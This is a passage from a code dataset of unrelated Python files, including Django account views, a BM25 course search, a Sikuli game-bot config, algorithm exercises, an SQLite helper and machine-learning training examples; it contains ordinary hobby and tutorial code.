' + course['desc']\n textArr.append(process(text))\n bm25 = BM25Okapi(textArr)\n interests = interests.replace('-',' ')\n query = process(interests)\n scores = bm25.get_scores(query).tolist()\n #return bm25.get_top_n(query, textArr, n=1)\n idx = scores.index(max(scores))\n relevantCourses = []\n for i in range(len(scores)):\n courses[i]['relevancy'] = scores[i]\n if(scores[i] > 0):\n relevantCourses.append(courses[i])\n relevantCourses = insertionInverseSort(relevantCourses)\n return relevantCourses\n\ndef getCourses(school):\n with open('course_catalogs/courses_' + school + '.json', 'r') as jsonFile:\n data = json.load(jsonFile)\n return data['courses']\n\n#getRelevantCourses('ucla', 'gang')\n\ndef process(text):\n text = text.lower()\n text = text.replace('.', '').replace(' ',' ')\n words = text.split(' ')\n porter = PorterStemmer()\n stems = []\n for word in words:\n stems.append(porter.stem(word))\n return stems\n\ndef insertionInverseSort(courses):\n for i in range(1, len(courses)):\n key = courses[i]\n j = i - 1\n while j >= 0 and key['relevancy'] > courses[j]['relevancy']:\n courses[j+1] = courses[j]\n j -= 1\n courses[j+1] = key\n return courses\n\n#out = getRelevantCourses('ucdavis', 'chemical-engineering')\n\n","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"367017555","text":"from datetime import datetime\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, logout, login\nfrom django.core.paginator import Paginator\n\nfrom courses.models import CourseInfo\nfrom operations.models import UserLove, UserMessage\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom utils.send_mail_tool import send_email_code\n# Create your views here.\n\nfrom users.forms import UserRegisterForm, UserLoginForm, UserForgetForm, UserResetForm, \\\n UserChangeImageForm, UserChangeInfoForm, UserChangeEmailForm, UserResetEmailForm, UserPwdForm\nfrom users.models import UserProfile, EmailVerifyCode, BannerInfo\n\nclass IndexView(View):\n def get(self, request):\n all_banners = BannerInfo.objects.all().order_by('-add_time')[:5]\n course_banners = CourseInfo.objects.filter(is_banner=True)[:3]\n all_course = CourseInfo.objects.filter(is_banner=False)[:6]\n all_orgs = OrgInfo.objects.all().order_by('-love_num')[:15]\n return render(request, 'index.html', locals())\n\n\n# def index(request):\n# all_banners = BannerInfo.objects.all().order_by('-add_time')[:5]\n# course_banners = CourseInfo.objects.filter(is_banner=True)[:3]\n# all_course = CourseInfo.objects.filter(is_banner=False)[:6]\n# all_orgs = OrgInfo.objects.all().order_by('-love_num')[:15]\n# return render(request, 'index.html', locals())\n\nclass RegisterView(View):\n def get(self, request):\n user_register_form = UserRegisterForm()\n return render(request, 'users/register.html', locals())\n\n def post(self, request):\n user_register_form = UserRegisterForm(request.POST)\n if user_register_form.is_valid():\n email = user_register_form.cleaned_data['email']\n password = user_register_form.cleaned_data['password']\n\n user_list = UserProfile.objects.filter(Q(username=email) | Q(email=email))\n if user_list:\n return render(request, 'users/register.html', {\n 'msg': '用户已经存在'\n 
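`getRelevantCourses` above stems each course description with `PorterStemmer`, scores it against the query with `BM25Okapi`, then sorts descending with a hand-written insertion sort (a plain `sorted(..., key=..., reverse=True)` would do the same in O(n log n)). The scoring core on a toy corpus, assuming `rank_bm25` is installed:

```python
from rank_bm25 import BM25Okapi

corpus = [
    "introduction to chemical engineering",
    "organic chemistry laboratory",
    "history of jazz music",
]
bm25 = BM25Okapi([doc.split() for doc in corpus])
scores = bm25.get_scores("chemical engineering".split())
print(scores.argmax())  # 0 -> the chemical engineering course scores highest
```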
})\n else:\n a = UserProfile()\n a.username = email\n a.set_password(password)\n a.email = email\n\n # 进行邮箱验证激活\n # 发送邮箱验证码\n if send_email_code(email, 1):\n a.save()\n return HttpResponse('情尽快前往邮箱激活账号')\n else:\n return HttpResponse('注册失败')\n # return redirect('/users/user_login')\n else:\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n\nclass LoginView(View):\n def get(self, request):\n return render(request, 'users/login.html')\n\n def post(self, request):\n user_login_form = UserLoginForm(request.POST)\n if user_login_form.is_valid():\n email = user_login_form.cleaned_data['email']\n password = user_login_form.cleaned_data['password']\n\n user = authenticate(username=email, password=password)\n if user:\n if user.is_start:\n login(request, user)\n a = UserMessage()\n a.message_man = user.id\n a.message_content = '欢迎登录'\n a.save()\n url = request.COOKIES.get('url', '/')\n ret = redirect(url)\n ret.delete_cookie('url')\n return ret\n else:\n return HttpResponse('请去邮箱激活账号')\n else:\n return render(request, 'users/login.html', {\n 'msg': '邮箱或密码有误'\n })\n else:\n return render(request, 'users/login.html', {\n 'user_login_form': user_login_form\n })\n\n\ndef user_logout(request):\n logout(request)\n return redirect('/')\n\n\ndef user_active(request, code):\n if code:\n print(code)\n email_ver_list = EmailVerifyCode.objects.filter(code=code)\n if email_ver_list:\n print(email_ver_list)\n email_ver = email_ver_list[0]\n email = email_ver.email\n print(email)\n user_list = UserProfile.objects.filter(username=email)\n print(user_list)\n if user_list:\n user = user_list[0]\n user.is_start = True\n user.save()\n return redirect('/')\n else:\n return HttpResponse('code1')\n else:\n return HttpResponse('code2')\n else:\n return HttpResponse('code3')\n\n\nclass ForgetView(View):\n def get(self, request):\n user_forget_form = UserForgetForm()\n\n return render(request, 'users/forgetpwd.html', {\n 'user_forget_form': user_forget_form\n })\n\n def post(self, request):\n user_forget_form = UserForgetForm(request.POST)\n if user_forget_form.is_valid():\n email = user_forget_form.cleaned_data['email']\n user_list = UserProfile.objects.filter(email=email)\n if user_list:\n if send_email_code(email, 2):\n return HttpResponse('情尽快去邮箱重置密码')\n else:\n msg = '验证失败'\n return render(request, 'users/forgetpwd.html', locals())\n else:\n msg = '用户不存在'\n return render(request, 'users/forgetpwd.html', locals())\n else:\n return render(request, 'users/forgetpwd.html', locals())\n\n\ndef user_reset(request, code):\n if code:\n if request.method == 'GET':\n return render(request, 'users/password_reset.html', {\n 'code': code\n })\n else:\n user_reset_form = UserResetForm(request.POST)\n if user_reset_form.is_valid():\n password1 = user_reset_form.cleaned_data['password1']\n password2 = user_reset_form.cleaned_data['password2']\n if password1 == password2:\n email_ver_list = EmailVerifyCode.objects.filter(code=code)\n if email_ver_list:\n email_ver = email_ver_list[0]\n email = email_ver.email\n user_list = UserProfile.objects.filter(email=email)\n if user_list:\n user = user_list[0]\n user.set_password(password1)\n user.save()\n return redirect('/users/user_login/')\n else:\n pass\n else:\n pass\n else:\n return render(request, 'users/password_reset.html', {\n 'msg': '密码不一致',\n 'code': code\n })\n else:\n return render(request, 'users/password_reset.html', {\n 'user_reset_form': user_reset_form\n })\n\n\ndef user_info(request):\n return render(request, 
'users/usercenter-info.html')\n\n\ndef user_changeimage(request):\n # instance 指明实例是什么,作修改的时候需要知道是给哪个对象实例进行修改,如果不指明,将会被当做创建对象去保存\n user_changeimage_form = UserChangeImageForm(request.POST, request.FILES, instance=request.user)\n if user_changeimage_form.is_valid():\n user_changeimage_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef user_changeinfo(request):\n user_changeinfo_form = UserChangeInfoForm(request.POST, instance=request.user)\n if user_changeinfo_form.is_valid():\n user_changeinfo_form.save(commit=True)\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_changeemail(request):\n user_changeeamil_form = UserChangeEmailForm(request.POST)\n if user_changeeamil_form.is_valid():\n email = user_changeeamil_form.cleaned_data['email']\n user_list = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if user_list:\n return JsonResponse({'status': 'fail', 'msg': '邮箱已经被绑定'})\n else:\n email_ver_list = EmailVerifyCode.objects.filter(email=email, send_type=3)\n if email_ver_list:\n email_ver = email_ver_list.order_by('-add_time')[0]\n # 判断当前时间和最近添加验证码的时间之差\n if (datetime.now() - email_ver.add_time).seconds > 60:\n email_ver.delete()\n send_email_code(email, 3)\n return JsonResponse({'status': 'ok', 'msg': '验证码已发送至邮箱'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '请去邮箱查看验证码或请一分钟后重新发送'})\n else:\n send_email_code(email, 3)\n return JsonResponse({'status': 'ok', 'msg': '验证码已发送至邮箱'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '您的邮箱存在异常'})\n\n\ndef user_resetemail(request):\n user_resetemail_form = UserResetEmailForm(request.POST)\n if user_resetemail_form.is_valid():\n email = user_resetemail_form.cleaned_data['email']\n code = user_resetemail_form.cleaned_data['code']\n print('==========', code, email)\n code_ver_list = EmailVerifyCode.objects.filter(email=email, code=code)\n print('-----------', code_ver_list)\n if code_ver_list:\n code_ver = code_ver_list[0]\n if (datetime.now() - code_ver.add_time).seconds < 60:\n request.user.username = email\n request.user.email = email\n request.user.save()\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '验证码已经失效,请重新获取验证码'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱或者验证码错误'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱或者验证码异常'})\n\n\ndef user_course(request):\n all_courses = request.user.usercourse_set.all()\n course_list = [usercourse.study_course for usercourse in all_courses]\n return render(request, 'users/usercenter-mycourse.html', locals())\n\n\ndef user_fav_org(request):\n # all_fav_org = request.user.userlove_set.all().filter(love_type=1)\n all_fav_org = UserLove.objects.filter(love_man=request.user, love_type=1, love_status=True)\n org_id_list = [user_fav.love_id for user_fav in all_fav_org]\n org_list = OrgInfo.objects.filter(id__in=org_id_list)\n return render(request, 'users/usercenter-fav-org.html', {\n 'org_list': org_list\n })\n\n\ndef user_fav_teacher(request):\n all_fav_teacher = UserLove.objects.filter(love_man=request.user, love_type=3, love_status=True)\n teacher_id_list = [user_fav.love_id for user_fav in all_fav_teacher]\n teacher_list = TeacherInfo.objects.filter(id__in=teacher_id_list)\n return render(request, 'users/usercenter-fav-teacher.html', {\n 'teacher_list': teacher_list\n })\n\n\ndef user_fav_course(request):\n all_fav_course = 
UserLove.objects.filter(love_man=request.user, love_type=2, love_status=True)\n course_id_list = [user_fav.love_id for user_fav in all_fav_course]\n course_list = CourseInfo.objects.filter(id__in=course_id_list)\n return render(request, 'users/usercenter-fav-course.html', {\n 'course_list': course_list\n })\n\n\ndef user_message(request):\n msg_list = UserMessage.objects.filter(message_man=request.user.id).order_by('-add_time')\n page = request.GET.get('page', 1)\n pages = Paginator(msg_list, 5)\n try:\n pager = pages.page(page)\n except:\n pager = pages.page(1)\n return render(request, 'users/usercenter-message.html', locals())\n\n\ndef user_message_read(request):\n read_id = request.GET.get('read_id', '')\n msg = UserMessage.objects.filter(id=int(read_id))\n if msg:\n msg[0].message_status = True\n msg[0].save()\n return JsonResponse({'status': 'ok', 'msg': 'success'})\n else:\n return JsonResponse({'status': 'fail', 'msg': 'fail'})\n\n\ndef user_change_pwd(request):\n user_change_pwd_form = UserPwdForm(request.POST)\n if user_change_pwd_form.is_valid():\n pwd = user_change_pwd_form.cleaned_data['pwd']\n repwd = user_change_pwd_form.cleaned_data['repwd']\n if pwd == repwd:\n user = request.user\n user.set_password(pwd)\n user.save()\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '密码不一致'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '密码不合法'})\n\n\ndef page_error(request):\n return render(request, '500.html')","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"584778609","text":"from turtle import Turtle, setworldcoordinates\nimport random\nclass Food(Turtle):\n\n def __init__(self):\n super().__init__() \n self.shape(\"circle\")\n self.penup()\n self.color(\"red\")\n self.speed(\"fastest\")\n self.shapesize(0.5,0.5)\n\n self.newLoc()\n \n def newLoc(self):\n rax=random.randint(-280,290)\n ray=random.randint(-290,290)\n self.goto(rax,ray)\n ","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"598870760","text":"# coding=utf-8\nfrom sikuli import *\n\nclass StageInformation:\n def __init__(self, image, waves):\n self.image = image\n self.waves = waves\n\nBotMachineImage = Pattern(\"BotMachineImage.png\").targetOffset(-34,19) # 請抓足以代表該視窗的標誌, 並且把目標位置偏移設到視窗內最左上角\n\n#####################################################\n# 助手開啟區 (把想要的設成True, 不想要的設成False\nChallengeDrawBot = False\nExchangeStaminaFruitBot = False\nMainStoryMode = False\n\n#####################################################\n# 刷關設定區(把想要的前面的井號拿掉, 其它前面都要有井號), 括號內第一個參數是要刷的關的圖, 第二個參數是這關有幾波 (目前無用, 可亂輸入)\nStages = {}\nStages[\"PreQuest1\" ] = StageInformation(\"1469840818738.png\", 3)\nStages[\"PreQuest2\" ] = StageInformation(\"1470737543685.png\", 3)\nStages[\"Apprentice1\" ] = StageInformation(\"1470737554297.png\", 3)\n#####################################################\n# 其他設定區\nTargetTime = -1 # 要打幾次, -1就是無限次\n\nCardsToSell = [\"1466877917129.png\", \"1469563069398.png\"] # 要賣的卡就丟進這裡, 記得Filter好鎖好\n# 要賣的卡抓的圖請抓在中間, 可以用左邊的綠標籤來做位置對應, 只能抓在\"選択し\"這三個字中間的區域\n# 或者是直接從下面的備用區拉上來\n\nUseStone = True # True或False, 是否要吃石回體力, 開之前請先想清楚\nApprenticeMode = True # True或False, 是否是練徒弟, 是的話到等級50會自動停掉\nDebugLog = False # True或False, 當有無法解決的問題的時候就打開這個\nWipeRevive = True # True或False, 是否自動復活 \nMasterID = \"\" 
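The `user_message` view above wraps `Paginator.page` in a bare `except:` to fall back to page 1; catching the paginator's two specific exceptions keeps the same behaviour without swallowing unrelated errors. A sketch of that pattern (the helper name is hypothetical):

```python
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger

def page_of(queryset, page, per_page=5):
    """Return the requested page, clamping bad ?page= values to page 1."""
    pages = Paginator(queryset, per_page)
    try:
        return pages.page(page)
    except (PageNotAnInteger, EmptyPage):
        return pages.page(1)
```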
# 師父的ID, 記得要填否則不會自動加師父好友\n######################################################\n\nCardsToSellBackup = [\"1469278773591.png\", \"1466877907788.png\"] # 備用","sub_path":"LongPianoConfig.sikuli/LongPianoConfig.py","file_name":"LongPianoConfig.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"436030439","text":"class Solution(object):\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n\n def valid(row, col):\n if row < 0 or col < 0:\n return False\n if row >= len(grid) or col >= len(grid[0]):\n return False\n return True\n\n def countEdge(row, col):\n if grid[row][col] == 0:\n return 0\n count = 4\n if valid(row, col - 1) and grid[row][col - 1] == 1:\n count -= 1\n if valid(row - 1, col) and grid[row - 1][col] == 1:\n count -= 1\n if valid(row, col + 1) and grid[row][col + 1] == 1:\n count -= 1\n if valid(row + 1, col) and grid[row + 1][col] == 1:\n count -= 1\n return count\n\n overlap_dict = {}\n h, w = len(grid), len(grid[0])\n total = 0\n for i in range(h):\n for j in range(w):\n total += countEdge(i, j)\n return total\n\n\nres = Solution().islandPerimeter([[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]])\nprint(res) #16\n","sub_path":"leet/题目/e463.py","file_name":"e463.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"296146086","text":"# import tkinter\n# import time\nclass FamilyTree:\n # canvas = None\n class Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n def __repr__(self):\n return str(self.data)\n def __contains__(self, item):\n return item == self.data\n\n def __init__(self, meno_suboru):\n # start = time.clock()\n t = open(meno_suboru)\n self.vztahy = dict()\n riadok = t.readline()\n self.synovia = set()\n self.otcovia = set()\n while riadok != '':\n kandidat = str(riadok.split())[2:-2].split('-')\n try:\n self.vztahy[kandidat[0]].add(kandidat[1])\n except:\n self.vztahy[kandidat[0]] = set()\n self.vztahy[kandidat[0]].add(kandidat[1])\n self.synovia.add(kandidat[1])\n self.otcovia.add(kandidat[0])\n riadok = t.readline()\n for key in self.vztahy.keys():\n if key not in self.synovia:\n self.root = self.Node(key)\n t.close()\n to_do = set()\n to_do.add(self.root)\n remove = set()\n while (self.vztahy):\n to_do = to_do - remove\n for node in to_do:\n parent = node\n try:\n kandidat = list(self.vztahy[parent.data])\n except:\n remove.add(parent)\n continue\n if len(kandidat) == 2:\n parent.left = self.Node(kandidat[0])\n parent.right = self.Node(kandidat[1])\n to_do.remove(parent); to_do.add(parent.left); to_do.add(parent.right)\n self.vztahy.pop(parent.data)\n break\n elif len(kandidat) == 1:\n parent.left = self.Node(kandidat[0])\n to_do.add(parent.left); to_do.remove(parent)\n self.vztahy.pop(parent.data)\n break\n else:\n break\n # end = time.clock()\n # print(end)\n\n def find(self, data):\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.data == data:\n return vrchol\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n\n def __len__(self):\n return len(self.synovia)+1\n\n def depth(self, data):\n strom = self.root\n if data == strom.data:\n return 0\n if strom is not None:\n q = [strom]\n posledny = q[0]\n level = 0\n while q:\n vrchol = 
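`islandPerimeter` above starts every land cell at 4 edges and subtracts 1 per occupied neighbour in all four directions. Scanning only the up and left neighbours folds that into a single pass — 4 per cell minus 2 per adjacent pair — with no bounds-checking helper. An equivalent sketch, checked against the same grid:

```python
def island_perimeter(grid):
    """Perimeter = 4 * land cells - 2 * orthogonally adjacent land pairs."""
    cells = pairs = 0
    for r, row in enumerate(grid):
        for c, v in enumerate(row):
            if v:
                cells += 1
                if r and grid[r - 1][c]:  # land above
                    pairs += 1
                if c and row[c - 1]:      # land to the left
                    pairs += 1
    return 4 * cells - 2 * pairs

assert island_perimeter([[0, 1, 0, 0], [1, 1, 1, 0], [0, 1, 0, 0], [1, 1, 0, 0]]) == 16
```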
q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n level += 1\n for v in q:\n if v.data == data:\n return level\n return None\n\n def height(self):\n level = 0\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n level+= 1\n return level\n\n def width(self):\n maxWidth = 0\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n if len(q) > maxWidth:\n maxWidth = len(q)\n return maxWidth\n\n def subtree_num(self, data):\n if data == self.root.data:\n return self.__len__()\n def pocet(data):\n if data is not None:\n q = [data]\n pocet = 1\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n pocet += len(q)\n posledny = q[-1]\n else:\n return 0\n return pocet\n return pocet(self.find(data))\n\n def descendant(self, data1, data2):\n if data1 == data2:\n return False\n def hladaj(strom):\n if strom is None:\n return False\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.data == data2:\n return True\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n return False\n podstrom = self.find(data1)\n return hladaj(podstrom)\n\n def level_set(self, k):\n strom = self.root\n tempset, return_set = set(), set()\n if k == 0:\n return_set.add(self.root.data)\n strom = None\n if strom is not None:\n q = [strom]\n infosky = [strom.data]\n level = 0\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n infosky.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n infosky.append(vrchol.left.data)\n if vrchol.right is not None:\n q.append(vrchol.right)\n infosky.append(vrchol.right.data)\n if posledny not in q and q != []:\n posledny = q[-1]\n level += 1\n if level == k:\n return_set = set(infosky)\n return return_set\n\n def leaves_num(self):\n sons = set(self.synovia)\n parents = set(self.otcovia)\n return len(sons - parents)\n\n\nif __name__ == '__main__':\n f = FamilyTree('subor1.txt')\n print('pocet vrcholov =', len(f))\n print('podstrom pre Bohumir =', f.subtree_num('Bohumir'))\n print('podstrom pre Robert =', f.subtree_num('Robert'))\n print('vyska =', f.height())\n print('sirka =', f.width())\n print('hlbka vrcholu Svatopluk =', f.depth('Svatopluk'))\n print('Miroslav ma potomka Bohuslav =', f.descendant('Miroslav','Bohuslav'))\n print('Svatopluk ma potomka Svatopluk =', f.descendant('Svatopluk','Svatopluk'))\n print('vrcholy na urovni 0 =', f.level_set(0))\n # print('vrcholy na urovni 1 =', f.level_set(1))\n # print('vrcholy na urovni 2 =', f.level_set(2))\n # print('vrcholy na urovni 3 =', f.level_set(3))\n # print('vrcholy na urovni 4 =', f.level_set(4))\n # print('vrcholy na urovni 5 =', f.level_set(5))\n # print('vrcholy na urovni 6 =', f.level_set(6))\n print('vrcholy na urovni 10 =', f.level_set(10))\n print('pocet listov =', 
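`depth`, `height`, `width` and `level_set` above each re-implement the same sentinel-based breadth-first search (`posledny` marks the last node of the current level). Materialising whole levels at a time turns each of those queries into a one-liner over a single traversal. A sketch against the same `Node` shape (`data`/`left`/`right`):

```python
def levels(root):
    """Yield one list of node data per tree level, top to bottom."""
    current = [root] if root is not None else []
    while current:
        yield [node.data for node in current]
        current = [child for node in current
                   for child in (node.left, node.right) if child is not None]

# height  == sum(1 for _ in levels(tree.root))
# width   == max(len(level) for level in levels(tree.root))
# level k == set(list(levels(tree.root))[k]) when the tree is deep enough
```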
f.leaves_num())\n # f.draw()\n","sub_path":"2014-2015/proj5.py","file_name":"proj5.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4399960","text":"import sqlite3 as lite\n\nclass Database:\n TABLE_NAME, PRIMARY_KEY = \"Dictionary\", \"Word\"\n\n def __init__(self,database):\n self.conn = lite.connect(database)\n self.cursor = self.conn.cursor()\n\n def close(self):\n self.cursor.close()\n self.conn.commit()\n self.conn.close()\n\n\n def save(self,words):\n for word in words:\n try:\n self.cursor.execute(\"INSERT INTO {0} VALUES (?)\"\n .format(Database.TABLE_NAME),\n [word, ])\n except:\n pass\n\n def getrowid(self,word):\n result = self.cursor.execute(\"SELECT rowid FROM {0} where Word = ?\"\n .format(Database.TABLE_NAME),(word,))\n try:\n rowid = result.__next__()[0]\n except StopIteration:\n rowid = -1\n return rowid\n\n def getsize(self):\n query = \"SELECT Count(*) FROM {0}\".format(\n Database.TABLE_NAME)\n result = self.cursor.execute(query)\n return result.fetchone()[0]\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"423942934","text":"import sys, getopt\n\ndef main(argv):\n if len(argv) > 1:\n raise Exception('too many args!')\n else:\n val = fibonacci(int(argv[0]))\n print(val)\n\ndef fibonacci(n):\n a,b = 1,1\n for i in range(n-1):\n a,b = b, a+b\n return a\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"algo_heights/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431094699","text":"# flake8: noqa\nimport os\nimport sys\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom catalyst import dl\n\nif os.getenv(\"USE_APEX\", \"0\") != \"0\" or os.getenv(\"USE_DDP\", \"0\") != \"0\":\n sys.exit()\n\n\n# sample data\nnum_samples, num_features, num_classes = int(1e4), int(1e1), 4\nX = torch.rand(num_samples, num_features)\ny = (torch.rand(num_samples, num_classes) > 0.5).to(torch.float32)\n\n# pytorch loaders\ndataset = TensorDataset(X, y)\nloader = DataLoader(dataset, batch_size=32, num_workers=1)\nloaders = {\"train\": loader, \"valid\": loader}\n\n# model, criterion, optimizer, scheduler\nmodel = torch.nn.Linear(num_features, num_classes)\ncriterion = torch.nn.BCEWithLogitsLoss()\noptimizer = torch.optim.Adam(model.parameters())\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [2])\n\n# model training\nrunner = dl.SupervisedRunner()\nrunner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n scheduler=scheduler,\n loaders=loaders,\n logdir=\"./logdir\",\n num_epochs=3,\n check=True,\n callbacks=[dl.MultiLabelAccuracyCallback(threshold=0.5)],\n)\n","sub_path":"tests/_tests_scripts/dl_z_mvp_classification2.py","file_name":"dl_z_mvp_classification2.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"265602264","text":"\"\"\"Load some data, fit Discover(), predict on validation data, make some plots, and save the model.\"\"\"\n# %% imports\nimport pandas as pd\nfrom crabnet.data.materials_data import elasticity\nfrom mat_discover.mat_discover_ import Discover\n\n# %% setup\n# set dummy to True for a quicker run --> small dataset, MDS 
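`Database.save` above silently swallows duplicate-word inserts with a bare `try/except`; SQLite can express that intent directly with `INSERT OR IGNORE`. A self-contained check against the same table shape as the class constants, using an in-memory database:

```python
import sqlite3

conn = sqlite3.connect(':memory:')
cur = conn.cursor()
cur.execute("CREATE TABLE Dictionary (Word TEXT PRIMARY KEY)")
cur.executemany("INSERT OR IGNORE INTO Dictionary VALUES (?)",
                [("apple",), ("apple",), ("pear",)])
cur.execute("SELECT Count(*) FROM Dictionary")
print(cur.fetchone()[0])  # 2 -- the duplicate 'apple' was ignored
conn.close()
```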
instead of UMAP\ndummy = False\n# set gcv to False for a quicker run --> group-cross validation can take a while\ngcv = False\ndisc = Discover(dummy_run=dummy, device=\"cuda\", target_unit=\"GPa\")\ntrain_df, val_df = disc.data(elasticity, fname=\"train.csv\", dummy=dummy)\ncat_df = pd.concat((train_df, val_df), axis=0)\n\n# %% fit\ndisc.fit(train_df)\n\n# %% predict\nscore = disc.predict(val_df, umap_random_state=42)\n\n# %% leave-one-cluster-out cross-validation\nif gcv:\n disc.group_cross_val(cat_df, umap_random_state=42)\n print(\"scaled test error = \", disc.scaled_error)\n\n# %% plot and save\ndisc.plot()\ndisc.save(dummy=dummy)\n","sub_path":"examples/mat_discover_example.py","file_name":"mat_discover_example.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"407417696","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport embed_video.fields\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('allinone', '0007_feedbacksuggestions'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='new',\n name='Model',\n field=models.IntegerField(choices=[(1, 'ax'), (2, 'videos')], default=1),\n ),\n migrations.AddField(\n model_name='new',\n name='video',\n field=embed_video.fields.EmbedVideoField(default=datetime.datetime(2015, 10, 17, 20, 25, 37, 699355, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='instagramimage',\n name='image',\n field=models.ImageField(upload_to='images/instagramimages/'),\n ),\n ]\n","sub_path":"nasimsite/allinone/migrations/0008_auto_20151017_2025.py","file_name":"0008_auto_20151017_2025.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"52785136","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n\n'''\n@author:wanglei1\n'''\n\n\nimport json\nimport os\n\n\nclass JsonConf:\n\n '''\n json configs\n '''\n\n @staticmethod\n def store(data, file_name):\n with open(file_name, 'w') as json_file:\n json_file.write(json.dumps(data, indent=4))\n\n @staticmethod\n def load(file_name):\n if not os.path.exists(file_name):\n with open(file_name, 'w') as json_file:\n pass\n with open(file_name) as json_file:\n try:\n data = json.load(json_file)\n except:\n data = {}\n return data\n\n @staticmethod\n def set(data_dict, file_name):\n json_obj = JsonConf.load(file_name)\n for key in data_dict:\n json_obj[key] = data_dict[key]\n JsonConf.store(json_obj, file_name)\n print(json.dumps(json_obj, indent=4))\n\n\nif __name__ == \"__main__\":\n data = {\"a\": \" 1\", \"f\": \"100\", \"b\": \"3000\"}\n file_name = 'configs.json'\n JsonConf.set(data, file_name)","sub_path":"wrapper/utils/config_util.py","file_name":"config_util.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"391333017","text":"\n# 2.1.13 Control flow\nif 1 > 2:\n message = \"if 1 were greater than 2\"\nelif 1 > 3:\n message = \"elif stands for 'else if'\"\nelse:\n message = \"else applies when no condition matches (and may be omitted)\"\n\nx = int(input())\nparity = \"even\" if x % 2 == 0 else \"odd\"\n\nx = 0\nwhile x < 10:\n print(x, \"is less than 